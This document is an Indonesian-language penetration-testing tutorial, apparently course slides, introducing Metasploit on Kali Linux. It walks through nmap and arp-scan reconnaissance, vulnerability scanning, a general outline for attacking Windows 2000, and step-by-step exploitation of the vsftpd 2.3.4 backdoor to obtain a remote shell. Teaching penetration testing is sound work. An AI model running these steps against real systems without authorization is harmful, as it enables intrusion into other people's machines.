Metasploit

Belajar Metasploit
• Untuk belajar metasploit di Kali Linux, pertama-tama Anda perlu menginstal metasploit
pada sistem Anda. Anda dapat melakukan ini dengan menjalankan perintah berikut di
terminal Anda:

apt-get update
apt-get install metasploit-framework

• Setelah metasploit terpasang, Anda dapat memulai programnya dengan menjalankan

perintah msfconsole di terminal Anda. Ini akan membuka konsol metasploit yang dapat
Anda gunakan untuk menjalankan berbagai tugas pentest.
• Untuk mempelajari lebih lanjut tentang metasploit, Anda dapat membaca dokumentasi
resmi di sini: https://metasploit.com/documentation/. Ada juga banyak sumber belajar
online yang dapat membantu Anda mempelajari tentang metasploit dan cara
menggunakannya.
Exploit ke windows 2000
• Untuk melakukan exploit pada sistem operasi Windows 2000 di Kali Linux, Anda perlu mengikuti
beberapa langkah-langkah penting. Pertama, pastikan bahwa Anda telah mengunduh dan
menginstal Metasploit Framework di Kali Linux. Metasploit adalah sebuah platform open-source
yang menyediakan berbagai alat dan fitur untuk melakukan exploit dan tes penetrasi.
• Kemudian, buka aplikasi Metasploit dan cari exploit yang sesuai dengan versi Windows 2000
yang ingin Anda jadikan sasaran. Anda dapat mencari exploit dengan mengetikkan perintah search
windows 2000 di terminal Metasploit. Setelah menemukan exploit yang sesuai, gunakan perintah
use untuk memuat exploit tersebut.
• Selanjutnya, Anda perlu menentukan alamat IP sasaran dan port yang akan digunakan untuk
mengirimkan paket exploit. Anda dapat menentukan alamat IP sasaran dengan menggunakan
perintah set RHOST dan port dengan perintah set RPORT. Pastikan bahwa komputer sasaran telah
terhubung ke jaringan dan dapat diakses melalui alamat IP yang Anda tentukan.
• Kemudian, jalankan exploit dengan menggunakan perintah exploit. Ini akan mengirimkan paket
exploit ke komputer sasaran dan mencoba untuk mengeksploitasi kelemahan yang ada pada sistem
operasi Windows 2000. Jika exploit berhasil, Anda akan mendapatkan akses shell ke komputer
sasaran dan dapat mengeksekusi perintah-perintah di dalamny
Pendahuluan
• Metasploit merupakan perangkat lunak yang menyediakan informasi kerentanan dan
bantuan dalam melakukan pengujian penetrasi.
Reconnaissance
• Menemukan host dalam satu jaringan menggunakan nmap:
nmap –sn x.x.x.x/24
• Menemukan perangkat yang terhubung dalam satu jaringan menggunakan arp-scan:
sudo arp-scan --interface eth0 x.x.x.x/24
Scanning
• Scanning IP tertentu dengan menampilkan versi dari layanan yang ada pada IP tersebut
dan dalam satu jaringan dengan nmap:

nmap -sV -p- x.x.x.x

Scanning
• Targetkan port 21 dan cari tahu kerentanan pada port tersebut.

nmap -Pn -p 21 --script vuln X.X.X.X

Exploitation
• Jalankan Metasploit di Kali Linux.

sudo msfconsole
Exploitation
• Gunakan fitur pencarian untuk menemukan modul exploit di msfconsole.

search vsftpd 2.3.4

Exploitation
• Gunakan exploit yang ada dengan perintah use.

use exploit/unix/ftp/vsftpd_234_backdoor
• Tampilkan options untuk melihat pengaturan modul dan atur IP remote host

set RHOSTS X.X.X.X

Exploit
• Jalankan exploit

• Shell dari server berhasil didapatkan

• Jalankan perintah whoami